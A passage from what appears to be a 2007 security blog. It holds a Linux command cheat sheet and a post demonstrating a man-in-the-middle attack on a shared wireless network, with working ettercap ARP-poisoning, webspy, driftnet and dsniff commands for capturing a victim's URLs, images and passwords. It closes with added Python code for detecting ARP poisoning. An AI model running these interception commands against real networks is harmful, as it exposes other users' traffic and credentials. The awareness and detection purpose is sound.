To capture network traffic:

ifconfig eth1 promisc
tcpdump -i eth1 -vv


All the above commands assume the interface is eth1. If you are unsure which is your wireless interface run iwconfig and look for the interface with the wireless extensions.



5. Hardware

To list installed hardware (available on ubuntu):

lshw

To list all PCI devices:

lspci

To list all USB devices:

lsusb

To list the loaded modules

lsmod

Another useful trick I have found relating to hardware: when I attach a new USB HDD and I am unsure what it will be called, I attach the device and then immediately look at /var/log/messages for the last entries. This usually gives me what I need. The tail command is useful here.

tail -n 10 /var/log/messages

This will display the last 10 lines of the log file.

To use tail and have it update (-s 2 will update every 2 seconds) as the log updates use the following command:

tail -n 10 -s 2 -f /var/log/messages

Running the dmesg command will also reveal useful information about hardware.


6. System Tools

To view free disk space use:

df -h

To view disk usage on the system use:

du

du can also be given a directory:

du /home/bob/

A useful tool for viewing running processes is top:

top

or for a more interactive version:

htop

You can also use ps to view process information.

To view a list of all running processes:

ps aux

To view a list of processes by a particular user (bob):

ps U bob

To view process in a tree:

ps -eH

To kill a process by its PID (28556 in this example):

kill 28556


Mounting Disks

To view a list of currently mounted file systems view /etc/mtab or use:

mount -l

To mount a disk first create a folder which you will mount it to:

mkdir /media/usb

mount -t ntfs /dev/sdb /media/usb

To unmount a disk:

umount /media/usb






What I'm Working On

The purpose of this post is just to list the blog projects I'm working on, to sort of commit to something and make sure I continue to get a post out every week.

The list is in no particular order. Some topics are quick ones and others require more research. It all depends on what time I can make.

What's Coming Up

  • Windows 2003 Server Hardening
  • Recovering Files From a Formatted Disk
  • Bluetooth Hacking
  • Captive Portal Fun
  • Passive Information Leakage
  • Securing Stuff with SSH

For the moment that's all.

Saturday, December 1, 2007

Wireless Fun For Bad People!

This blog post is a quick one to demonstrate just how vulnerable your information is if you're using a network, be it wired or wireless.

Strong encryption would mitigate this risk, however it would only mitigate it if you are the only person on that network. So if you're on a work network, a coffee shop wireless network or any other network with other people also on it, this type of attack is totally possible. In my examples below I am on a wireless network using WPA encryption, however my attacker is also authenticated to the same wireless access point. This is a common scenario.

In the case of a wired network this attack would only work if the attacker is on the same LAN as his victim.

Okay, on to the attack. In the examples below the victim is 192.168.1.200, the gateway (WAP) is 192.168.1.5.

What I used.

  • Ettercap
  • Webspy (part of the dsniff suite of tools)
  • Driftnet
  • Firefox (or any browser)

What I did

In this scenario I'll be running Ubuntu (7.10) as root. It is important that I use root to use the tools listed above. Once I have figured out where the gateway is, which is easy enough (route), I pick my target (192.168.1.200) and the gateway and I ARP poison them to become the Man-in-the-Middle.

ettercap -T -M arp:remote -i eth1 /192.168.1.200/ /192.168.1.5/



This effectively sets me up between the target and the gateway and I receive all the traffic. If I had wanted to grab all traffic going out from any host on that LAN I would have used:

ettercap -T -M arp:remote -i eth1 /192.168.1.5/ //


I then configure ip forwarding by running the following command:

echo 1 > /proc/sys/net/ipv4/ip_forward

I then use cat to check it's enabled (1).

cat /proc/sys/net/ipv4/ip_forward



Next I set up Webspy. Webspy is part of the Dsniff suite of tools and will send any URLs visited to my browser. I did try to use the Remote Browser plugin for ettercap but it wouldn't work as reliably as Webspy.

webspy -i eth1 192.168.1.200



Webspy is pretty cool and in testing sent about 80% of the URLs to my listening browser, but not all of them and not secure sites using SSL (https).


Next start up Firefox. This needs to be done as root. Any browsed URLs will be sent to this browser and open up in a new tab for each URL. Other browsers will probably work but I never tested them.


Then I might set up Driftnet. Driftnet can capture images or audio and save them to a directory, but in my example I will just send them to my screen.

driftnet -i eth1



As you can see from my Driftnet window above my target is browsing Binrev and obviously has great taste!

I could have also fired up Dsniff to grab passwords and the like at this stage using:

dsniff -i eth1

So if it's not too obvious by now why this is a problem, think of it like this. When you log into your email in a web cafe or on a train on the wireless network, when you look at your email, or read anything online, even if your computer is fully patched and you're using a super new firewall and it's set up correctly, you're still vulnerable to someone seeing almost everything you do online.

And that's it. Just a little sniffing fun. And remember, as I said, this type of fun can be had on wired LANs too.
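The defensive side of this is that ARP poisoning leaves a visible trace on the wire: the gateway's IP suddenly answers from a new MAC, and one MAC ends up claiming both the gateway and the victim. The Python below is an added example, not part of the original post or of any of the tools listed: it reads lines in the format 'tcpdump -n -e arp' prints and raises an alert on either sign. The sample lines are constructed (the IPs match the scenario above, the MACs are invented).

```python
import re
from collections import defaultdict

# One ARP reply as printed by 'tcpdump -n -e arp':
#   <time> <src mac> > <dst mac>, ethertype ARP (0x0806), length 42: Reply <ip> is-at <mac>, length 28
ARP_REPLY_RE = re.compile(
    r"^(\S+) .*?: Reply (\d+\.\d+\.\d+\.\d+) is-at ([0-9a-f]{2}(?::[0-9a-f]{2}){5})")

class ArpWatch:
    """Track which MAC each IP claims and flag the two signs of ARP-cache poisoning:
    an IP whose MAC changes, and one MAC answering for several IPs (typically the
    gateway and the victim at once)."""
    def __init__(self):
        self.ip_to_mac = {}
        self.mac_to_ips = defaultdict(set)

    def observe(self, line: str):
        m = ARP_REPLY_RE.match(line)
        if not m:
            return []                       # requests and non-ARP lines carry no claim
        ts, ip, mac = m.groups()
        alerts = []
        old = self.ip_to_mac.get(ip)
        if old is not None and old != mac:
            alerts.append(("mac-changed", ts, ip, old, mac))
        self.ip_to_mac[ip] = mac
        claimed = self.mac_to_ips[mac]
        if claimed and ip not in claimed:
            alerts.append(("one-mac-many-ips", ts, mac, tuple(sorted(claimed | {ip}))))
        claimed.add(ip)
        return alerts

def scan(lines):
    """Run the watcher over a capture's text output; returns every alert raised."""
    watch = ArpWatch()
    alerts = []
    for line in lines:
        alerts.extend(watch.observe(line))
    return alerts

# Constructed sample lines (not a real capture). 192.168.1.5 is the gateway and
# 192.168.1.200 the client, as in the post above; the MACs are made up.
SAMPLE_ARP_LINES = [
    "12:00:01.000000 00:0c:29:aa:aa:aa > 00:0c:29:bb:bb:bb, ethertype ARP (0x0806), length 42: "
    "Reply 192.168.1.5 is-at 00:0c:29:aa:aa:aa, length 28",
    "12:00:01.100000 00:0c:29:bb:bb:bb > 00:0c:29:aa:aa:aa, ethertype ARP (0x0806), length 42: "
    "Reply 192.168.1.200 is-at 00:0c:29:bb:bb:bb, length 28",
    "12:00:30.000000 00:0c:29:cc:cc:cc > 00:0c:29:bb:bb:bb, ethertype ARP (0x0806), length 42: "
    "Reply 192.168.1.5 is-at 00:0c:29:cc:cc:cc, length 28",       # a third MAC now claims the gateway
    "12:00:30.100000 00:0c:29:cc:cc:cc > 00:0c:29:aa:aa:aa, ethertype ARP (0x0806), length 42: "
    "Reply 192.168.1.200 is-at 00:0c:29:cc:cc:cc, length 28",     # ...and the client too
    "12:00:31.000000 00:0c:29:aa:aa:aa > ff:ff:ff:ff:ff:ff, ethertype ARP (0x0806), length 42: "
    "Request who-has 192.168.1.200 tell 192.168.1.5, length 28",
]
```

On the sample lines scan() raises three alerts: the gateway changing MAC, the client changing MAC, and the new MAC claiming both. To run it against live traffic, feed the lines of tcpdump -n -e -l arp to scan(). A static ARP entry for the gateway on each client (arp -s) stops the poisoned reply from being accepted in the first place; it does not replace the encryption the post's conclusion recommends.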